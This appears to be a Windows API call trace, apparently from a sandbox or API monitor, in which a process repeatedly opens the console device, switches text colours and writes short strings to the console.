	[0090.444] GetLastError () returned 0xcb
	[0090.444] CloseHandle (hObject=0x3b) returned 1
	[0090.444] GetLastError () returned 0xcb
	[0090.447] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0090.447] GetLastError () returned 0xcb
	[0090.447] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.447] GetLastError () returned 0xcb
	[0090.447] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
	[0090.447] GetLastError () returned 0xcb
	[0090.447] CloseHandle (hObject=0x3b) returned 1
	[0090.447] GetLastError () returned 0xcb
	[0090.450] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0090.450] GetLastError () returned 0xcb
	[0090.450] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.450] GetLastError () returned 0xcb
	[0090.450] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x19a3d74*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a3d74*, lpNumberOfCharsWritten=0x43aea0c*=0x3e) returned 1
	[0090.451] GetLastError () returned 0xcb
	[0090.451] CloseHandle (hObject=0x3b) returned 1
	[0090.451] GetLastError () returned 0xcb
	[0090.453] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0090.453] GetLastError () returned 0xcb
	[0090.454] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.454] GetLastError () returned 0xcb
	[0090.454] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
	[0090.454] GetLastError () returned 0xcb
	[0090.454] CloseHandle (hObject=0x3b) returned 1
	[0090.454] GetLastError () returned 0xcb
	[0090.457] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0090.459] GetLastError () returned 0xcb
	[0090.459] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.459] GetLastError () returned 0xcb
	[0090.459] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
	[0090.459] GetLastError () returned 0xcb
	[0090.459] CloseHandle (hObject=0x3b) returned 1
	[0090.459] GetLastError () returned 0xcb
	[0090.462] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0090.462] GetLastError () returned 0xcb
	[0090.462] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
	[0090.462] GetLastError () returned 0xcb
	[0090.462] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.462] GetLastError () returned 0xcb
	[0090.462] CloseHandle (hObject=0x3b) returned 1
	[0090.463] GetLastError () returned 0xcb
	[0090.465] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0090.465] GetLastError () returned 0xcb
	[0090.466] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.466] GetLastError () returned 0xcb
	[0090.469] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f
	[0090.469] GetLastError () returned 0xcb
	[0090.469] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.469] GetLastError () returned 0xcb
	[0090.471] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43
	[0090.472] GetLastError () returned 0xcb
	[0090.472] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.472] GetLastError () returned 0xcb
	[0090.474] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0090.474] GetLastError () returned 0xcb
	[0090.474] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.474] GetLastError () returned 0xcb
	[0090.474] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
	[0090.475] GetLastError () returned 0xcb
	[0090.475] CloseHandle (hObject=0x47) returned 1
	[0090.475] GetLastError () returned 0xcb
	[0090.477] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0090.477] GetLastError () returned 0xcb
	[0090.477] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.477] GetLastError () returned 0xcb
	[0090.477] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
	[0090.477] GetLastError () returned 0xcb
	[0090.478] CloseHandle (hObject=0x47) returned 1
	[0090.478] GetLastError () returned 0xcb
	[0090.480] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0090.480] GetLastError () returned 0xcb
	[0090.480] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.481] GetLastError () returned 0xcb
	[0090.481] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x19a418c*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a418c*, lpNumberOfCharsWritten=0x43aea0c*=0x11) returned 1
	[0090.481] GetLastError () returned 0xcb
	[0090.481] CloseHandle (hObject=0x47) returned 1
	[0090.481] GetLastError () returned 0xcb
	[0090.483] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0090.483] GetLastError () returned 0xcb
	[0090.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.484] GetLastError () returned 0xcb
	[0090.484] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
	[0090.484] GetLastError () returned 0xcb
	[0090.484] CloseHandle (hObject=0x47) returned 1
	[0090.484] GetLastError () returned 0xcb
	[0090.487] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0090.487] GetLastError () returned 0xcb
	[0090.487] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.487] GetLastError () returned 0xcb
	[0090.487] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
	[0090.487] GetLastError () returned 0xcb
	[0090.487] CloseHandle (hObject=0x47) returned 1
	[0090.487] GetLastError () returned 0xcb
	[0090.490] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0090.490] GetLastError () returned 0xcb
	[0090.490] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
	[0090.490] GetLastError () returned 0xcb
	[0090.490] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.490] GetLastError () returned 0xcb
	[0090.490] CloseHandle (hObject=0x47) returned 1
	[0090.490] GetLastError () returned 0xcb
	[0090.493] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0090.493] GetLastError () returned 0xcb
	[0090.493] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.493] GetLastError () returned 0xcb
	[0090.496] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b
	[0090.496] GetLastError () returned 0xcb
	[0090.496] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.496] GetLastError () returned 0xcb
	[0090.498] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f
	[0090.499] GetLastError () returned 0xcb
	[0090.499] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.499] GetLastError () returned 0xcb
	[0090.501] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0090.501] GetLastError () returned 0xcb
	[0090.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.501] GetLastError () returned 0xcb
	[0090.501] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
	[0090.501] GetLastError () returned 0xcb
	[0090.502] CloseHandle (hObject=0x53) returned 1
	[0090.502] GetLastError () returned 0xcb
	[0090.504] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0090.504] GetLastError () returned 0xcb
	[0090.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.505] GetLastError () returned 0xcb
	[0090.505] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
	[0090.505] GetLastError () returned 0xcb
	[0090.505] CloseHandle (hObject=0x53) returned 1
	[0090.505] GetLastError () returned 0xcb
	[0090.509] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0090.509] GetLastError () returned 0xcb
	[0090.509] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.510] GetLastError () returned 0xcb
	[0090.510] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x19a4504*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a4504*, lpNumberOfCharsWritten=0x43aea0c*=0x39) returned 1
	[0090.510] GetLastError () returned 0xcb
	[0090.510] CloseHandle (hObject=0x53) returned 1
	[0090.510] GetLastError () returned 0xcb
	[0090.515] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0090.515] GetLastError () returned 0xcb
	[0090.515] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.515] GetLastError () returned 0xcb
	[0090.515] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
	[0090.515] GetLastError () returned 0xcb
	[0090.516] CloseHandle (hObject=0x53) returned 1
	[0090.516] GetLastError () returned 0xcb
	[0090.520] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0090.520] GetLastError () returned 0xcb
	[0090.520] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.521] GetLastError () returned 0xcb
	[0090.521] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
	[0090.521] GetLastError () returned 0xcb
	[0090.521] CloseHandle (hObject=0x53) returned 1
	[0090.521] GetLastError () returned 0xcb
	[0090.526] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0090.526] GetLastError () returned 0xcb
	[0090.526] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
	[0090.526] GetLastError () returned 0xcb
	[0090.526] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.527] GetLastError () returned 0xcb
	[0090.527] CloseHandle (hObject=0x53) returned 1
	[0090.527] GetLastError () returned 0xcb
	[0090.531] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0090.532] GetLastError () returned 0xcb
	[0090.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.532] GetLastError () returned 0xcb
	[0090.536] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57
	[0090.536] GetLastError () returned 0xcb
	[0090.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.537] GetLastError () returned 0xcb
	[0090.541] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b
	[0090.541] GetLastError () returned 0xcb
	[0090.541] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.541] GetLastError () returned 0xcb
	[0090.545] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0090.546] GetLastError () returned 0xcb
	[0090.546] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.546] GetLastError () returned 0xcb
	[0090.546] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
	[0090.546] GetLastError () returned 0xcb
	[0090.546] CloseHandle (hObject=0x5f) returned 1
	[0090.546] GetLastError () returned 0xcb
	[0090.550] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0090.551] GetLastError () returned 0xcb
	[0090.551] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.551] GetLastError () returned 0xcb
	[0090.551] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
	[0090.551] GetLastError () returned 0xcb
	[0090.551] CloseHandle (hObject=0x5f) returned 1
	[0090.551] GetLastError () returned 0xcb
	[0090.555] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0090.556] GetLastError () returned 0xcb
	[0090.556] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.556] GetLastError () returned 0xcb
	[0090.556] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x19a49f0*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a49f0*, lpNumberOfCharsWritten=0x43aea0c*=0x4f) returned 1
	[0090.556] GetLastError () returned 0xcb
	[0090.556] CloseHandle (hObject=0x5f) returned 1
	[0090.557] GetLastError () returned 0xcb
	[0090.561] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0090.561] GetLastError () returned 0xcb
	[0090.561] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.561] GetLastError () returned 0xcb
	[0090.561] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
	[0090.561] GetLastError () returned 0xcb
	[0090.561] CloseHandle (hObject=0x5f) returned 1
	[0090.562] GetLastError () returned 0xcb
	[0090.566] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0090.566] GetLastError () returned 0xcb
	[0090.566] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.567] GetLastError () returned 0xcb
	[0090.567] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
	[0090.567] GetLastError () returned 0xcb
	[0090.567] CloseHandle (hObject=0x5f) returned 1
	[0090.567] GetLastError () returned 0xcb
	[0090.572] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0090.572] GetLastError () returned 0xcb
	[0090.572] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
	[0090.572] GetLastError () returned 0xcb
	[0090.572] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.572] GetLastError () returned 0xcb
	[0090.572] CloseHandle (hObject=0x5f) returned 1
	[0090.572] GetLastError () returned 0xcb
	[0090.577] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0090.612] GetLastError () returned 0xcb
	[0090.612] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.612] GetLastError () returned 0xcb
	[0090.615] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63
	[0090.615] GetLastError () returned 0xcb
	[0090.615] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.615] GetLastError () returned 0xcb
	[0090.618] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67
	[0090.618] GetLastError () returned 0xcb
	[0090.618] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.618] GetLastError () returned 0xcb
	[0090.621] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0090.621] GetLastError () returned 0xcb
	[0090.621] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.621] GetLastError () returned 0xcb
	[0090.621] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
	[0090.621] GetLastError () returned 0xcb
	[0090.621] CloseHandle (hObject=0x6b) returned 1
	[0090.621] GetLastError () returned 0xcb
	[0090.624] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0090.624] GetLastError () returned 0xcb
	[0090.624] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.624] GetLastError () returned 0xcb
	[0090.624] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
	[0090.624] GetLastError () returned 0xcb
	[0090.624] CloseHandle (hObject=0x6b) returned 1
	[0090.624] GetLastError () returned 0xcb
	[0090.627] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0090.627] GetLastError () returned 0xcb
	[0090.627] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.627] GetLastError () returned 0xcb
	[0090.627] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x19a4ecc*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a4ecc*, lpNumberOfCharsWritten=0x43aea0c*=0x19) returned 1
	[0090.627] GetLastError () returned 0xcb
	[0090.627] CloseHandle (hObject=0x6b) returned 1
	[0090.628] GetLastError () returned 0xcb
	[0090.630] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0090.630] GetLastError () returned 0xcb
	[0090.630] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.630] GetLastError () returned 0xcb
	[0090.630] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
	[0090.630] GetLastError () returned 0xcb
	[0090.630] CloseHandle (hObject=0x6b) returned 1
	[0090.631] GetLastError () returned 0xcb
	[0090.633] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0090.633] GetLastError () returned 0xcb
	[0090.633] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.633] GetLastError () returned 0xcb
	[0090.633] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
	[0090.633] GetLastError () returned 0xcb
	[0090.634] CloseHandle (hObject=0x6b) returned 1
	[0090.634] GetLastError () returned 0xcb
	[0090.636] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0090.636] GetLastError () returned 0xcb
	[0090.636] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
